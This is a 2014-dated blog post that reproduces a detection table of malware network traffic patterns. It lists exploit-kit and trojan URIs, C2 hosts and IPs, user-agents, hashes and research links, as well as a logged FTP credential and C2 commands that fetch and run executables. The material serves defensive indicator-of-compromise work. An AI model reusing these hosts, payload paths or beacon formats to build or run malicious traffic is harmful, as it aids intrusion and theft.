Monday, February 3, 2014

Traffic pattern listing - Redirect

See the full Traffic Patterns table: 


This post is for search engines (as they don't index Google Spreadsheet data)


Columns, in this order (quoted cells span several lines; empty cells are omitted): family, method, uri, path2, header, ua, port, md5s, ref_url
Carberp / Glupteba GET "/get_ads.php?yy=1&aid=2&atr=exts&src=199
/go/p1011105.subexts
/go/page/landing_page_68?nid=14&layout=qna&pid=p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
/javascript/live_cd/popunder_script-1400195675.js
/images/ffadult/css/header.css
/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css" "/get_ads.php?yy=1&aid
/go/
/live_cd/
/ffadult/" 80 85acec48c593832bdd57f90aec783a28 http://malware-traffic-analysis.net/2014/12/25/index.html
Fiesta EK GET "/?_SPMq=vahK1gfvq3&z1_Aj=fW8sL8ld&nkPgy=81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf=fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86__=He0S4m9G&QPy3i=J4HP58S7h&dRPS8=7bi7Y
/?3W_wN=I40_W5_&eht=t8vP8M8L&2ad_uO=33KPa&_s3oi=8P5_7&QLfo=cHai8w&ZM7P_K=bSG7TH3p&UKb38=1s4wx2s&jSJyB=cM7c
/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf=1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
/?_I4XS=idKbueq4kR1q8&0TsZ=Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty=x21dbrs8y5
/?m_FxE=eh0&MkFq=H8GeS&fz7=1l3&d2T6r=ae&LeH_9=k0Il2W&Z7i6=3S1&7h_=Sdlc&zmGAU=i0uf&mMwf=ehp5p&ymV7T=y7lKe&Jpk_DF=_5_2" /? 80 http://malware-traffic-analysis.net/2014/12/26/index.html
Fiesta EK GET "/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
/ai_qkvu2/4a374fcc5b4966050058040c015d52530052030f0f5201530f54070e0507525450;118800;94
/ai_qkvu2/074f70a95a1651de5952585d020b50090404045e0c0403090b02005f0651500e54" /ai_qkvu2/ 80 http://malware-traffic-analysis.net/2014/12/17/index.html
Gongdad / Gong Da compromised site redirects GET "/pg/kcp/index.html
/popup/index.html
/my/by4.html" http://malware-traffic-analysis.net/2014/12/13/index.html
Gongdad / Gong Da EK GET "/data/file/cr/index.html
/data/file/cr/swfobject.js
/data/file/cr/jquery-1.4.2.min.js
/data/file/cr/main.html
/data/file/cr/AyVpSf.jar
/data/file/cr/com.class
/data/file/cr/edu.class
/data/file/cr/net.class
/data/file/cr/org.class
/windos.exe" /data/file/cr/ http://malware-traffic-analysis.net/2014/12/13/index.html
Dalexis Loader GET "/tmp/pack.tar.gz
/assets/pack.tar.gz
/piwigotest/pack.tar.gz
/histoiredesarts/pack.tar.gz
/fit/pack.tar.gz" /pack.tar.gz 80 http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam
Gholee / Rocket Kitten GET / POST "/index.php?c=Ud7atknq&r=17117d
/index.php?c=Ud7atknq&r=1710b2" /index.php?c= 80 http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
Zemot GET /b/shoe /b/shoe 80 http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
Zemot DL via Asprox GET /catalog/159 /catalog/159 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Zemot downloading Rovnix GET /mod_jshopping_products_gdle/mod_smartslider2/ /mod_smartslider2/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Zemot downloading Rerdom GET /mod_jshoppi/soft32.dl /soft32.dl 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Rerdom GET /b/eve/<redacted> /b/eve/ 8080 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Clickfraud GET /b/req/<redacted> /b/req/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Cidox / Rerdom / Clickfraud GET "/b/eve/e91425775cc5d7e657bd2cc7
/b/letr/21D84379F768D95442B92BC5
/b/opt/E1805AD5D79824076249D696
/b/req/FDD953BA382388758DF27AE4
/b/pkg/<redacted>" "/b/eve/
/b/letr/
/b/opt/
/b/req/
/b/pkg/" 80 http://www.malware-traffic-analysis.net/2014/07/21/index.html
Cidox / Rerdom / Clickfraud - clickurl GET GET /x/48petqwk9/<redacted>/AA/0 /x/48petqwk9/ 80 https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
Cidox / Rerdom / Clickfraud - clickurl GET GET /2014/06/26/new-game-tech-behind-scenes-sony-playstation with referrer http://controller-best.com referrer http://controller-best.com 80
Scieron / Httneilc / HTClient "packet data
0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00" 8081 "http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99
http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
Zollard RFI POST /cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E /cgi-bin/php? "Host: <target server>
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1825
Connection: close" Mozilla/5.0 (compatible; Zollard; Linux) 80
Upatre GET "/js/jquery-1.41.15.js
/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a=1846&kZuJV1OyPrXdK0=1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
/js/jquery-1.41.15.js?get_message=3290013886" /js/jquery-1.41.15.js 80 "a752bedbbf6b73e52e2d7f8f3cd6a227
2c7810794a5027ddfc0568808dea3437" http://malware-traffic-analysis.net/2015/01/21/index.html
Cryptowall 3.0 POST "http://proxy1-1-1.i2p/fee4roy2hih9
http://payto4gtpn5czl2.torforall.com/ofs20c" "i2p
torforall.com/ofs20c" 80 e67edfaa0d65e822fe41bf978ccd9c3c https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203
Andromeda POST /ldr.php /ldr.php "Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 80
Angler EK Chain GET /t19jl0hvv2.php 80
Angler EK Chain GET /752s2n0ndw.php 80
Angler EK Chain GET /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2CmdYZyWhw1bW9lGM8EDW8cKKjx47cp 80
Angler EK Chain GET /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy48WScNKA9m2DKeiJNTp7gSxYSPcXsN 80
Angler EK Chain GET /models/runway/ring/header.js 80
Angler EK Chain GET /code/decrease/revenue/core.js 80
Asprox / Kuluoz GET "/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9tJTB67xoumOnEvak=
HTTPS over port 443 as a possible connectivity check" /include.php?t= 80 http://malware-traffic-analysis.net/2015/01/02/index.html
Asprox / Kuluoz POST /index.php /index.php 80 http://malware-traffic-analysis.net/2015/01/02/index.html
Chanitor POST /gate.php /gate.php Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 80
Chanitor Downloads GET "/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/wp-includes/js/tinymce/skins/lightgray/1.php
/wp-content/plugins/motopress-content-editor/flexslider/fonts/1.php
/wp-includes/js/tinymce/plugins/wpfullscreen/1.php" /1.php 80
Cryptowall POST "/532boskc3i0
/nvebi4m4ggdokz
/wbkljtzpimbryt" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 80
Cryptowall GET "/wp-content/themes/exiportal/dh5x3a1815j
/wp-content/themes/esther/6l7de" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 80
Dridex payload GET "/mopsi/popsi.php
/js/bin.exe" "/popsi.php
/bin.exe" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) 80
Fake AV post compromise GET /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7=kyxnujmwnn 80 http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/
Fiesta EK GET "/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
/txf9p_v8/14dcb5b6b53272fd050d5358500e5401000750585657520d0400060703005305;114402;287
/txf9p_v8/4dc239e53174afbc5d010f090102530205575709075b550e01500156520c5406" /txf9p_v8/ 80 http://malware-traffic-analysis.net/2015/01/20/index.html
Flashpack EK GET /sv62a76d18537/index.php /index.php 80
GameThief POST /tj.asp /tj.asp 80
GameThief GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack /count.asp?mac= 80 http://malware-traffic-analysis.net/2015/01/03/index.html
Gypothy GET /bigbight/kinkong.txt /kinkong.txt "Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: adakaobiri.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) 80
H-W0rm POST /SpCoderHere |pcname|hostname|username .. other pc data 80
KaiXin EK GET "/indexindex/
/indexindex/gg.jpg
/indexindex/jquery-1.4.2.min.js
/indexindex/swfobject.js
/indexindex/main.html
/xzz1.exe
/indexindex/NlNwQh.jar
/indexindex/com.class
/indexindex/edu.class
/indexindex/net.class
/indexindex/org.class" /indexindex/ 80 http://malware-traffic-analysis.net/2015/01/03/index.html
Kovter POST "/9/form.php
/11/form.php
/w1/form.php
/1/feed.php" /form.php "Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko
Host: b7-golfix.org
Content-Length: 368
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko 80
Nuclear EK GET / POST "/XhBWV0gBT08OVFVW.html
/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHAJDQUhXVlxUVgdOVRtA
/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh1GRlVLVEJLVgUBT0AONi0fCB0j" 80 http://malware-traffic-analysis.net/2015/01/18/index2.html
Poweliks GET "/query?version=1.7&sid=1101&builddate=201214&q=low+testosterone+in+men&ua=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q=fast+weight+loss&ua=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q=pain+in+knee+cap&ua=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q=anti+aging+cream+for+men&ua=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2" ?version=1.7&sid= ls=2 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) 80
Redirect to Fiesta EK GET "/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g=aPp8X-02-GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO&m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3" 80 http://malware-traffic-analysis.net/2015/01/20/index.html
Sweet Orange EK GET "/admin4_account/mobile/movies.php?timeline=18
/bad/generic/help.php?state=39
/cnet/tmp/Indy_admin/investor.php?setup=20
/dbadmin/wp-admin/hex/help.php?state=33
/forums/example/screens/investor.php?setup=20
/gcc/tmp/bad/help.php?state=25
/ip/ch/investor.php?setup=20
/profiles/stat/movies.php?timeline=21" "/timeline=18
/state=39
/setup=20
/state=33
/state=25
/timeline=21
/timeline=20
/france=155
/state=31"
Sweet Orange EK GET "/printer.php?cover=1388&catalogp=4&links=423&speeches=171&about=1836&arts=205&anal=1064
/printer.php?cover=1388&catalogp=4&links=423&speeches=171&about=1836&arts=205&anal=1064&errfix=urepair
/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171&shows=2171&trans=867&misc=1087&urepair=errfix
/store.php?back=669&nav_m=75&sendmail=4&stats=1186&logout=171&state=2215&CRIME=2249
/teen.php?corp=2718&what=2210&soma=4&apps=1014&pipermail=171&intl=783&best=535
/teen.php?corp=2718&what=2210&soma=4&apps=1014&pipermail=171&intl=783&best=535&repfix=fixutil
/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171&feed=2093&film=663&comp=954
/serial.php?help=805&browsers=4&about=2398&icons=171&music=247&sony=430&work=2315" "/printer.php
/store.php
/teen.php
/serial.php
/fixutil=repfix
/repfix=fixutil" 80
TBD POST /store/ /store/ 80 http://malware-traffic-analysis.net/2015/01/20/index2.html
TBD Post Flashpack GET "/r?q=wrestling&subid=4699&link=kkCguKA.EeSIskSKW9RPYQ
/search?q=wrestling&subid=4699
/click?q=wrestling&subid=4699&link=kkCguKA.EeSIskSKW9RPYQ" /r?q= /search?q= /click?q= 80 http://malware-traffic-analysis.net/2015/01/20/index.html
TBD Proxy (Htbot?) GET "/ocfg.php?command=getip
/ocfg.php?command=getid
/ocfg.php?command=ghl&id=1493496
/ocfg.php?command=dl&id=1493496
/ocfg.php?command=version&id=1493496
/ocfg.php?command=getbackconnect
/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW" /ocfg.php?command= 80 http://malware-traffic-analysis.net/2015/01/12/index.html
Upatre GET "/1501us22/<PC--NAME>/0/51-SP3/0/
/1501us22/<PC--NAME>/1/0/0/
/2807cw/<PC-Name>/1/0/0/
/2807cw/<PC-Name>/41/5/4/
/2807cw/<PC-Name>/0/51-SP2/0/
/1201uk1/<PC-Name>/0/61/0/
/1201uk1/<PC-Name>/0/51-SP3/0/
/1201uk1/<PC-Name>/1/0/0/
/1201uk1/<PC-Name>/41/7/4/
/2307stat/<PC-Name>/0/51Service%20Pack%202/0/
/2307stat/<PC-Name>/1/0/0/
/2307stat/<PC-Name>/41/5/4/" "/1201uk1/
/2307stat/
/2807cw/
/1501us22/" Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache 80
Vavtrak / Neverquest POST /collection/0000004E/00/9EBD6132 /collection/ 80 http://malware-traffic-analysis.net/2015/01/18/index2.html
Zeus GET "/backup/config.bin
/en/images/config.bin
/guardnow/config.bin
/guardnow/config.bin" /config.bin "Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.192.103.10
Content-Length: 128
Connection: Keep-Alive
Cache-Control: no-cache

\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 80
Zeus POST /choosen/helps/file.php /helps/file.php "Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.192.103.10
Content-Length: 128
Connection: Keep-Alive
Cache-Control: no-cache

\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 80
AdWare Kraddare.IL GET /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN:: /config.php?q=^/irW@ 80 http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
AdWare Kraddare.IL POST /bv/config.php /config.php 80 http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
Dyre GET /2001uk11/HOME/1/0/0/ /HOME/1/0/0/ "User-Agent: Mozilla/5.0
Host: 202.153.35.133:33384
Cache-Control: no-cache" Mozilla/5.0 80 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre GET /mandoc/eula012.pdf /eula012.pdf "Accept: text/*, application/*
User-Agent: Mozilla/5.0
Host: clicherfort.com
Cache-Control: no-cache" Mozilla/5.0 80 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre GET /mandoc/ml1from1.tar /ml1from1.tar "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: essextwp.org
" Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
Dyre plugin dl GET /ineede900.rar 80
Kazy GET /cmd/api.php?mk=20140708041847777&action=get_availability&partoffer_id=11229&a2=FR /api.php?mk= 80 https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/
Mudrop GET /gcs?alpha=YBvfs8NDNYK3vSEO+p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= /gcs?alpha= "Host: api.greenerweb.info
Cache-Control: no-store,no-cache
Pragma: no-cache
Connection: Keep-Alive"
ChePro (Brazil.banker) GET /ini/xvwmmwb.mod /xvwmmwb.mod "Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) "2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)" http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files
Cryptolocker POST /home/ /home/ "Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 9cbb128e8211a7cd00729c159815cb1c http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/
Reedum 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] "220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ...................." 0ca4f93a848cf01348336a8c6ff22daf http://www.naked-security.com/malware/Infostealer.Reedum/
Vidgrab POST (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. "....3
HTTP/1.1 301 Moved Permanently
Location:http://windowsupdate.microsoft.com/
Content-Type: text/html
Connection: Keep-Alive
<h1>Bad Request (Invalid Verb)</h1>
.....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|." 660709324acb88ef11f71782af28a1f0 http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#more
Page / stscout / Elise / lStudio / Wumins GET /29af9cdc/page_12082223.html /page_ "Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: gorush.dyndns-web.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Win32) 443 aaf73666cbd750ed22b80ed836d2b1e4 http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#more
Tijcont GET /s/blog_b2afd7fe01019tkf.htm /blog_ "/3.txt
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

/s/blog_b2afd7fe01019tkf.html
User-Agent: getURLDown
Host: blog.sina.com.cn

/album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg
User-Agent: loadMM
Host: e.hiphotos.bdimg.com" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM 80,6000,8888, 845b0945d5fe0e0aaa16234dc21484e0 http://my.opera.com/cjbi/blog/index.dml/tag/Tijcont
Darkcomet GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== /a.php?id= "/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
Host: [ip.address]" none dc98abba995771480aecf4769a88756e http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/
Kelihos GET /index.htm /index.htm "Host: 188.129.243.106
Content-Length: 164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0

..D.lUUE..H@.q..#.....K.zfgE0F.A..K.

Variants:
/default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm" "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)
Mozilla/5.0 (Windows NT 5.0; rv:21.0)
Mozilla/5.0 (Windows NT 5.1)
Mozilla/5.0 (Windows NT 5.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:22.0)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Mozilla/5.0 (Windows NT 6.2)
Mozilla/5.0 (Windows NT 6.2; rv:21.0)
Mozilla/5.0 (Windows NT 6.2; WOW64)
Mozilla/5.0 (X11; Linux i686; rv:21.0)
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0)
Opera/9.80 (Windows NT 5.1; U; zh-sg)
Opera/9.80 (Windows NT 6.0)
Opera/9.80 (Windows NT 6.1; U; es-ES)" 1052 C94DC5C9BB7B99658C275B7337C64B33 http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2
Kuluoz Run command from C2 n "c=run&u=/get/7d2c37d2070e1b386070db8c851dae08.exe&crc=9e2b9c4f465b765fc971423935c4b68e" &crc= "HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 27 Aug 2013 20:06:57 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding"
njRAT / Backdoor.LV "lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 ...

171.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'||'|'|b88ece4c04f706c9717bbe6fbda49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uLi4uLi4uDQpyZWVlZWVkLmR5bmRucy5iaXo6MjUyNTQNCkFwcERhdGENCldpbnJhci5leGUNClRydWUNCkZhbHNlDQpUcnVlDQpGYWxzZQ==0.

251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

lv|'|'|VHJvamFuX0M0NkY2RTk=|'|'|MARK|'|'|user|'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]" "lv
171.ll
251.ll" 1d3baedd747f6f9bf92c81eb9f63b34b http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html
Chimerka.1 / Refyes.A POST /sys.php /sys.php "Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112" Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 bede0da1abc1122acf8af91f6d6b289f http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2
Sality GET /images/logos.gif?1f5428=8212640 /logos.gif? "User-Agent: Opera/9.50 (Windows NT 6.0; U; en)
Host: boyabateml.k12.tr
Cache-Control: no-cache" "Opera/9.50 (Windows NT 6.0; U; en) 
Opera/8.89 (Windows NT 6.0; U; en)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)" "176222923eaa64b43b4f75f8afaad81e 
a972f612afa03f1d0b3ffad10843e935 
4f693f209daccf69b1c785573c0002c5"
Nitedrem GET /down.asp?action=install&u=cpmcpm&p=2366A64BAA384EA6AB9CEF73E8E2BE12&t=7393 /down.asp?action=install&u= "User-Agent: fucking
Host: bucks.onepiecedream.com:99" fucking 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /upx/kod.txt?k=123&t=7215 /kod.txt?k=123&t= "User-Agent: fucking
Host: 103.20.193.231:88" User-Agent: fucking 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
